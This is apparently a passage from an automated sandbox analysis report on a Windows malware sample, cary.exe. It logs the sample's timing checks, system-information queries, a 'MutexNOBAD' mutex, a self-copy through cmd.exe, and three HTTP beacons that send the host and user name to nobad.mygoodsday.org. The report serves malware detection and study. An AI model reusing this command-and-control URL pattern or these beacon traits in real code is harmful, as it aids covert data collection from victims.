| Get Time | type = Ticks, time = 278187 |
|
1 | |
| Get Time | type = Ticks, time = 278203 |
|
2 | |
| Get Time | type = Ticks, time = 278218 |
|
5 | |
| Get Time | type = Ticks, time = 278234 |
|
4 | |
| Get Time | type = Ticks, time = 278312 |
|
8 | |
| Get Time | type = Ticks, time = 278328 |
|
16 | |
| Get Time | type = Ticks, time = 278531 |
|
7 | |
| Get Time | type = Ticks, time = 278546 |
|
8 | |
| Get Time | type = Ticks, time = 278562 |
|
3 | |
| Get Time | type = Ticks, time = 278625 |
|
5 | |
| Get Time | type = Ticks, time = 278640 |
|
7 | |
| Get Time | type = Ticks, time = 279390 |
|
4 | |
| Get Time | type = Ticks, time = 279406 |
|
6 | |
| Get Time | type = Ticks, time = 279421 |
|
2 | |
| Get Time | type = Ticks, time = 279640 |
|
1 | |
| Get Time | type = Ticks, time = 279656 |
|
1 | |
| Get Time | type = Ticks, time = 279875 |
|
8 | |
| Get Time | type = Ticks, time = 279890 |
|
5 | |
| Get Time | type = Ticks, time = 280515 |
|
3 | |
| Get Time | type = Ticks, time = 280531 |
|
10 | |
| Get Time | type = Ticks, time = 280546 |
|
8 | |
| Get Time | type = Ticks, time = 280625 |
|
5 | |
| Get Time | type = Ticks, time = 280640 |
|
3 | |
| Get Time | type = Ticks, time = 280765 |
|
2 | |
| Get Time | type = Ticks, time = 280781 |
|
4 | |
| Get Time | type = Ticks, time = 280796 |
|
1 | |
| Get Time | type = Ticks, time = 280812 |
|
6 | |
| Get Time | type = Ticks, time = 280828 |
|
8 | |
| Get Time | type = Ticks, time = 281359 |
|
4 | |
| Get Time | type = Ticks, time = 281375 |
|
16 | |
| Get Time | type = Ticks, time = 281390 |
|
16 | |
| Get Time | type = Ticks, time = 281609 |
|
2 | |
| Get Time | type = Ticks, time = 281625 |
|
14 | |
| Get Time | type = Ticks, time = 281640 |
|
16 | |
| Get Time | type = Ticks, time = 283031 |
|
4 | |
| Get Time | type = Ticks, time = 283046 |
|
8 | |
| Get Time | type = Ticks, time = 283062 |
|
2 | |
| Get Time | type = Ticks, time = 283078 |
|
2 | |
| Get Time | type = Ticks, time = 283093 |
|
6 | |
| Get Time | type = Ticks, time = 283296 |
|
4 | |
| Get Time | type = Ticks, time = 283312 |
|
13 | |
| Get Time | type = Ticks, time = 283328 |
|
3 | |
| Get Time | type = Ticks, time = 283343 |
|
12 | |
| Get Time | type = Ticks, time = 283468 |
|
12 | |
| Get Time | type = Ticks, time = 283484 |
|
6 | |
| Get Time | type = Ticks, time = 283609 |
|
4 | |
| Get Time | type = Ticks, time = 283625 |
|
10 | |
| Get Time | type = Ticks, time = 283937 |
|
8 | |
| Get Time | type = Ticks, time = 283953 |
|
6 | |
| Get Time | type = Ticks, time = 283968 |
|
14 | |
| Get Time | type = Ticks, time = 284109 |
|
5 | |
| Get Time | type = Ticks, time = 284125 |
|
11 | |
| Get Time | type = Ticks, time = 284140 |
|
16 | |
| Get Time | type = Ticks, time = 284406 |
|
10 | |
| Get Time | type = Ticks, time = 284421 |
|
12 | |
| Get Time | type = Ticks, time = 284437 |
|
6 | |
| Get Time | type = Ticks, time = 284562 |
|
1 | |
| Get Time | type = Ticks, time = 284578 |
|
9 | |
| Get Time | type = Ticks, time = 284593 |
|
10 | |
| Get Time | type = Ticks, time = 284937 |
|
6 | |
| Get Time | type = Ticks, time = 284953 |
|
8 | |
| Get Time | type = Ticks, time = 284968 |
|
8 | |
| Get Time | type = Ticks, time = 285125 |
|
1 | |
| Get Time | type = Ticks, time = 285156 |
|
1 | |
| Get Time | type = Ticks, time = 285171 |
|
1 | |
| Get Time | type = Ticks, time = 285187 |
|
3 | |
| Get Time | type = Ticks, time = 285203 |
|
6 | |
| Get Time | type = Ticks, time = 285218 |
|
6 | |
| Get Time | type = Ticks, time = 285234 |
|
6 | |
| Get Time | type = Ticks, time = 285546 |
|
10 | |
| Get Time | type = Ticks, time = 285562 |
|
6 | |
| Get Time | type = Ticks, time = 285796 |
|
8 | |
| Get Time | type = Ticks, time = 285812 |
|
10 | |
| Get Time | type = Ticks, time = 285828 |
|
8 | |
| Get Time | type = Ticks, time = 285984 |
|
8 | |
| Get Time | type = Ticks, time = 286000 |
|
4 | |
| Get Time | type = Ticks, time = 286062 |
|
8 | |
| Get Time | type = Ticks, time = 286218 |
|
6 | |
| Get Time | type = Ticks, time = 286234 |
|
12 | |
| Get Time | type = Ticks, time = 286250 |
|
8 | |
| Get Time | type = Ticks, time = 286484 |
|
9 | |
| Get Time | type = Ticks, time = 286500 |
|
7 | |
| Get Time | type = Ticks, time = 286515 |
|
8 | |
| Get Time | type = Ticks, time = 286734 |
|
2 | |
| Get Time | type = Ticks, time = 286750 |
|
4 | |
| Get Time | type = Ticks, time = 286765 |
|
2 | |
| Get Time | type = Ticks, time = 286781 |
|
4 | |
| Get Time | type = Ticks, time = 286796 |
|
2 | |
| Get Time | type = Ticks, time = 287359 |
|
2 | |
| Get Time | type = Ticks, time = 287375 |
|
6 | |
| Get Time | type = Ticks, time = 287390 |
|
5 | |
| Get Time | type = Ticks, time = 287484 |
|
1 | |
| Get Time | type = Ticks, time = 287500 |
|
6 | |
| Get Time | type = Ticks, time = 287515 |
|
8 | |
| Get Time | type = Ticks, time = 287531 |
|
2 | |
| Get Time | type = Ticks, time = 287671 |
|
4 | |
| Get Time | type = Ticks, time = 287718 |
|
2 | |
| Get Time | type = Ticks, time = 287734 |
|
6 | |
| Get Time | type = Ticks, time = 287750 |
|
6 | |
| Get Time | type = Ticks, time = 287859 |
|
4 | |
| Get Time | type = Ticks, time = 287875 |
|
4 | |
| Get Time | type = Ticks, time = 287890 |
|
3 | |
| Get Time | type = Ticks, time = 287906 |
|
4 | |
| Get Time | type = Ticks, time = 287921 |
|
7 | |
| Get Time | type = Ticks, time = 288015 |
|
8 | |
| Get Time | type = Ticks, time = 288031 |
|
6 | |
| Get Time | type = Ticks, time = 288046 |
|
10 | |
| Get Time | type = Ticks, time = 288156 |
|
2 | |
| Get Time | type = Ticks, time = 288265 |
|
2 | |
| Get Time | type = Ticks, time = 288281 |
|
4 | |
| Get Time | type = Ticks, time = 288296 |
|
8 | |
| Get Time | type = Ticks, time = 288625 |
|
2 | |
| Get Time | type = Ticks, time = 288640 |
|
8 | |
| Get Time | type = Ticks, time = 288656 |
|
4 | |
| Get Time | type = Ticks, time = 288781 |
|
7 | |
| Get Time | type = Ticks, time = 288890 |
|
1 | |
| Get Time | type = Ticks, time = 288921 |
|
8 | |
| Get Time | type = Ticks, time = 288937 |
|
6 | |
| Get Time | type = Ticks, time = 288968 |
|
6 | |
| Get Time | type = Ticks, time = 288984 |
|
8 | |
| Get Time | type = Ticks, time = 289000 |
|
6 | |
| Get Time | type = Ticks, time = 289078 |
|
8 | |
| Get Time | type = Ticks, time = 289093 |
|
10 | |
| Get Time | type = Ticks, time = 289250 |
|
4 | |
| Get Time | type = Ticks, time = 289265 |
|
6 | |
| Get Time | type = Ticks, time = 289281 |
|
4 | |
| Get Time | type = Ticks, time = 289406 |
|
8 | |
| Get Time | type = Ticks, time = 289421 |
|
8 | |
| Get Time | type = Ticks, time = 289468 |
|
2 | |
| Get Time | type = Ticks, time = 289484 |
|
6 | |
| Get Time | type = Ticks, time = 289640 |
|
4 | |
| Get Time | type = Ticks, time = 289656 |
|
2 | |
| Get Time | type = Ticks, time = 289671 |
|
8 | |
| Get Time | type = Ticks, time = 289718 |
|
8 | |
| Get Time | type = Ticks, time = 289890 |
|
8 | |
| Get Time | type = Ticks, time = 289906 |
|
4 | |
| Get Time | type = Ticks, time = 289921 |
|
6 | |
| Get Time | type = Ticks, time = 290171 |
|
6 | |
| Get Time | type = Ticks, time = 290187 |
|
8 | |
| Get Time | type = Ticks, time = 290218 |
|
6 | |
| Get Time | type = Ticks, time = 290234 |
|
2 | |
| Get Time | type = Ticks, time = 290250 |
|
2 | |
| Get Time | type = Ticks, time = 290265 |
|
8 | |
| Get Time | type = Ticks, time = 290406 |
|
6 | |
| Get Time | type = Ticks, time = 290468 |
|
6 | |
| Get Time | type = Ticks, time = 290484 |
|
8 | |
| Get Time | type = Ticks, time = 290531 |
|
2 | |
| Get Time | type = Ticks, time = 290546 |
|
8 | |
| Get Time | type = Ticks, time = 290562 |
|
6 | |
| Get Time | type = Ticks, time = 290578 |
|
4 | |
| Get Time | type = Ticks, time = 290765 |
|
4 | |
| Get Time | type = Ticks, time = 290781 |
|
6 | |
| Get Time | type = Ticks, time = 290796 |
|
8 | |
| Get Time | type = Ticks, time = 290859 |
|
2 | |
| Get Time | type = Ticks, time = 290875 |
|
8 | |
| Get Time | type = Ticks, time = 291000 |
|
2 | |
| Get Time | type = Ticks, time = 291015 |
|
6 | |
| Get Time | type = Ticks, time = 291031 |
|
10 | |
| Get Time | type = Ticks, time = 291109 |
|
4 | |
| Get Time | type = Ticks, time = 291140 |
|
3 | |
| Get Time | type = Ticks, time = 291171 |
|
1 | |
| Get Time | type = Ticks, time = 291187 |
|
8 | |
| Get Time | type = Ticks, time = 291203 |
|
7 | |
| Get Time | type = Ticks, time = 291296 |
|
1 | |
| Get Time | type = Ticks, time = 291312 |
|
2 | |
| Get Time | type = Ticks, time = 291328 |
|
10 | |
| Get Time | type = Ticks, time = 291343 |
|
9 | |
| Get Time | type = Ticks, time = 291578 |
|
1 | |
| Get Time | type = Ticks, time = 291593 |
|
6 | |
| Get Time | type = Ticks, time = 292312 |
|
2 | |
| Get Time | type = Ticks, time = 292375 |
|
8 | |
| Get Time | type = Ticks, time = 292390 |
|
6 | |
| Get Time | type = Ticks, time = 292437 |
|
6 | |
| Get Time | type = Ticks, time = 292453 |
|
7 | |
| Get Time | type = Ticks, time = 292468 |
|
1 | |
| Get Time | type = Ticks, time = 292484 |
|
8 | |
| Get Time | type = Ticks, time = 292500 |
|
10 | |
| Get Time | type = Ticks, time = 292515 |
|
6 | |
| Get Time | type = Ticks, time = 292546 |
|
6 | |
| Get Time | type = Ticks, time = 292562 |
|
8 | |
| Get Time | type = Ticks, time = 292578 |
|
6 | |
| Get Time | type = Ticks, time = 292593 |
|
7 | |
| Get Time | type = Ticks, time = 292609 |
|
9 | |
| Get Time | type = Ticks, time = 292625 |
|
8 | |
| Get Time | type = Ticks, time = 292640 |
|
8 | |
| Get Time | type = Ticks, time = 292718 |
|
4 | |
| Get Time | type = Ticks, time = 292734 |
|
8 | |
| Get Time | type = Ticks, time = 292750 |
|
6 | |
| Get Time | type = Ticks, time = 292765 |
|
8 | |
| Get Time | type = Ticks, time = 292781 |
|
6 | |
| Get Time | type = Ticks, time = 292796 |
|
6 | |
| Get Time | type = Ticks, time = 292812 |
|
6 | |
| Get Time | type = Ticks, time = 292859 |
|
8 | |
| Get Time | type = Ticks, time = 292875 |
|
8 | |
| Get Time | type = Ticks, time = 292890 |
|
8 | |
| Get Time | type = Ticks, time = 292906 |
|
7 | |
| Get Time | type = Ticks, time = 293281 |
|
1 | |
| Get Time | type = Ticks, time = 293296 |
|
6 | |
| Get Time | type = Ticks, time = 293312 |
|
8 | |
| Get Time | type = Ticks, time = 293328 |
|
6 | |
| Get Time | type = Ticks, time = 293343 |
|
8 | |
| Get Time | type = Ticks, time = 293359 |
|
6 | |
| Get Time | type = Ticks, time = 293375 |
|
8 | |
| Get Time | type = Ticks, time = 293437 |
|
4 | |
| Get Time | type = Ticks, time = 293453 |
|
4 | |
| Get Time | type = Ticks, time = 293468 |
|
8 | |
| Get Time | type = Ticks, time = 293484 |
|
2 | |
| Get Time | type = Ticks, time = 293515 |
|
6 | |
| Get Time | type = Ticks, time = 293531 |
|
2 | |
| Get Time | type = Ticks, time = 293546 |
|
2 | |
| Get Time | type = Ticks, time = 293562 |
|
2 | |
| Get Time | type = Ticks, time = 293578 |
|
4 | |
| Get Time | type = Ticks, time = 293593 |
|
4 | |
| Get Time | type = Ticks, time = 293609 |
|
7 | |
| Get Time | type = Ticks, time = 293625 |
|
5 | |
| Get Time | type = Ticks, time = 293671 |
|
8 | |
| Get Time | type = Ticks, time = 293687 |
|
8 | |
| Get Time | type = Ticks, time = 293703 |
|
10 | |
| Get Time | type = Ticks, time = 293718 |
|
4 | |
| Get Time | type = Ticks, time = 293734 |
|
6 | |
| Get Time | type = Ticks, time = 293750 |
|
10 | |
| Get Time | type = Ticks, time = 293765 |
|
8 | |
| Get Time | type = Ticks, time = 293812 |
|
6 | |
| Get Time | type = Ticks, time = 293828 |
|
12 | |
| Get Time | type = Ticks, time = 293843 |
|
10 | |
| Get Time | type = Ticks, time = 293890 |
|
10 | |
| Get Time | type = Ticks, time = 293906 |
|
10 | |
| Get Time | type = Ticks, time = 293921 |
|
6 | |
| Get Time | type = Ticks, time = 293937 |
|
8 | |
| Get Time | type = Ticks, time = 294015 |
|
6 | |
| Get Time | type = Ticks, time = 294031 |
|
7 | |
| Get Time | type = Ticks, time = 294046 |
|
7 | |
| Get Time | type = Ticks, time = 294062 |
|
8 | |
| Get Time | type = Ticks, time = 294078 |
|
10 | |
| Get Time | type = Ticks, time = 294093 |
|
6 | |
| Get Time | type = Ticks, time = 294109 |
|
8 | |
| Get Time | type = Ticks, time = 294156 |
|
1 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Hardware Information |
|
2 | |
| Get Info | type = Operating System |
|
3 |
Mutex (4455)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = MutexNOBAD |
|
1 | |
| Create | - |
|
1 | |
| Open | mutex_name = MutexNOBAD, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE |
|
1 | |
| Release | - |
|
4452 |
Network Behavior
DNS (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = nobad.mygoodsday.org, address_out = 104.218.120.192, service = 80 |
|
3 |
TCP Sessions (3)
| Information | Value |
|---|---|
| Total Data Sent | 729 bytes |
| Total Data Received | 12.02 KB |
| Contacted Host Count | 1 |
| Contacted Hosts | 104.218.120.192:80 |
TCP Session #1
| Information | Value |
|---|---|
| Handle | 0x280 |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 104.218.120.192 |
| Remote Port | 80 |
| Local Address | 0.0.0.0 |
| Local Port | 49421 |
| Data Sent | 231 bytes |
| Data Received | 4.01 KB |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 104.218.120.192, remote_port = 80 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 231, size_out = 231 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4102, size_out = 4102 |
|
1 | |
| Close | type = SOCK_STREAM |
|
1 |
TCP Session #2
| Information | Value |
|---|---|
| Handle | 0x294 |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 104.218.120.192 |
| Remote Port | 80 |
| Local Address | 0.0.0.0 |
| Local Port | 49531 |
| Data Sent | 247 bytes |
| Data Received | 4.01 KB |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 104.218.120.192, remote_port = 80 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 247, size_out = 247 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4102, size_out = 4102 |
|
1 | |
| Close | type = SOCK_STREAM |
|
1 |
TCP Session #3
| Information | Value |
|---|---|
| Handle | 0x28c |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 104.218.120.192 |
| Remote Port | 80 |
| Local Address | 0.0.0.0 |
| Local Port | 49621 |
| Data Sent | 251 bytes |
| Data Received | 4.01 KB |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 104.218.120.192, remote_port = 80 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 251, size_out = 251 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4102, size_out = 4102 |
|
1 | |
| Close | type = SOCK_STREAM |
|
1 |
HTTP Sessions (3)
| Information | Value |
|---|---|
| Total Data Sent | 729 bytes |
| Total Data Received | 12.02 KB |
| Contacted Host Count | 1 |
| Contacted Hosts | nobad.mygoodsday.org |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; Synapse) |
| Server Name | nobad.mygoodsday.org |
| Server Port | 80 |
| Data Sent | 231 |
| Data Received | 4102 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; Synapse), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = nobad.mygoodsday.org, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.0, target_resource = /addrecord.php?apikey=nobad_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=q6HPvbWwYBJ3el0y&phase=START |
|
1 | |
| Send HTTP Request | headers = connection: keep-alive, host: nobad.mygoodsday.org, keep-alive: 300, user-agent: Mozilla/4.0 (compatible; Synapse), url = nobad.mygoodsday.org/addrecord.php?apikey=nobad_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=q6HPvbWwYBJ3el0y&phase=START |
|
1 | |
| Read Response | size = 4102, size_out = 4102 |
|
1 | |
| Close Session | - |
|
1 |
HTTP Session #2
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; Synapse) |
| Server Name | nobad.mygoodsday.org |
| Server Port | 80 |
| Data Sent | 247 |
| Data Received | 4102 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; Synapse), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = nobad.mygoodsday.org, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.0, target_resource = /addrecord.php?apikey=nobad_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=q6HPvbWwYBJ3el0y&phase=[ALL]18DFC06EA5F8FC78 |
|
1 | |
| Send HTTP Request | headers = connection: keep-alive, host: nobad.mygoodsday.org, keep-alive: 300, user-agent: Mozilla/4.0 (compatible; Synapse), url = nobad.mygoodsday.org/addrecord.php?apikey=nobad_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=q6HPvbWwYBJ3el0y&phase=[ALL]18DFC06EA5F8FC78 |
|
1 | |
| Read Response | size = 4102, size_out = 4102 |
|
1 | |
| Close Session | - |
|
1 |
HTTP Session #3
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; Synapse) |
| Server Name | nobad.mygoodsday.org |
| Server Port | 80 |
| Data Sent | 251 |
| Data Received | 4102 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; Synapse), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = nobad.mygoodsday.org, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.0, target_resource = /addrecord.php?apikey=nobad_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=q6HPvbWwYBJ3el0y&phase=18DFC06EA5F8FC78|4576|1GB |
|
1 | |
| Send HTTP Request | headers = connection: keep-alive, host: nobad.mygoodsday.org, keep-alive: 300, user-agent: Mozilla/4.0 (compatible; Synapse), url = nobad.mygoodsday.org/addrecord.php?apikey=nobad_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=q6HPvbWwYBJ3el0y&phase=18DFC06EA5F8FC78|4576|1GB |
|
1 | |
| Read Response | size = 4102, size_out = 4102 |
|
1 | |
| Close Session | - |
|
1 |
Process #3: cmd.exe
318
0
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\CIiHmnxMn6Ps\Desktop\cary.exe" "C:\Users\CIiHmnxMn6Ps\Desktop\NWI6lHB5.exe" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:00:44, Reason: Child Process |
| Unmonitor | End Time: 00:00:50, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xddc |
| Parent PID | 0xda0 (c:\users\ciihmnxmn6ps\desktop\cary.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
DE0
0x
E28
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000003b0000 | 0x003b0000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003b0000 | 0x003b0000 | 0x003bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003c3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003d1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003d3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x003f3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x0043ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000440000 | 0x00440000 | 0x0053ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000540000 | 0x00540000 | 0x00543fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000550000 | 0x00550000 | 0x00550fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000560000 | 0x00560000 | 0x00561fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000570000 | 0x00570000 | 0x005affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005b0000 | 0x005b0000 | 0x005bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x005cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005e0000 | 0x005e0000 | 0x006dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006e0000 | 0x006e0000 | 0x006effff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x006f0000 | 0x007adfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000007b0000 | 0x007b0000 | 0x008affff | Private Memory | rw |
|
|
|
- |
| cmd.exe.mui | 0x008b0000 | 0x008d0fff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x0497ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004a00000 | 0x04a00000 | 0x04a0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a10000 | 0x04a10000 | 0x04a9bfff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74990000 | 0x749b7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ea80000 | 0x7ea80000 | 0x7eb7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007eb80000 | 0x7eb80000 | 0x7eba2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007eba7000 | 0x7eba7000 | 0x7eba7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eba8000 | 0x7eba8000 | 0x7eba8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ebaa000 | 0x7ebaa000 | 0x7ebacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ebad000 | 0x7ebad000 | 0x7ebaffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\CIiHmnxMn6Ps\Desktop\cary.exe | 3.71 MB |
MD5:
9c7e90d7637277bb4f4985405eb0ace9
SHA1: 5b0899d790eb4a37260e5d9b8a2ad3f2ada55b1d SHA256: 335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf SSDeep: 98304:Pvqlou/EtfzJS+1S6+T9aLcNvvj5Pudln7QktFJLRyC2hVW13:w/Q7I+T8aLcNvvjQn7QkjFkDVW |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\NWI6lHB5.exe | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 SSDeep: 3:: |
|
|
Host Behavior
File (278)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\cary.exe | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\NWI6lHB5.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\NWI6lHB5.exe | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\cary.exe | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\NWI6lHB5.exe | type = file_attributes |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\NWI6lHB5.exe | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
2 | |
| Get Info | - | type = size, size_out = 0 |
|
1 | |
| Get Info | - | type = size, size_out = 0 |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
8 | |
| Open | STD_INPUT_HANDLE | - |
|
3 | |
| Open | - | - |
|
64 | |
| Open | - | - |
|
65 | |
| Copy | C:\Users\CIiHmnxMn6Ps\Desktop\NWI6lHB5.exe | source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\cary.exe |
|
1 | |
| Read | - | size = 512, size_out = 512 |
|
1 | |
| Read | - | size = 65024, size_out = 65024 |
|
59 | |
| Read | - | size = 65024, size_out = 65024 |
|
59 | |
| Read | - | size = 65024, size_out = 52736 |
|
1 | |
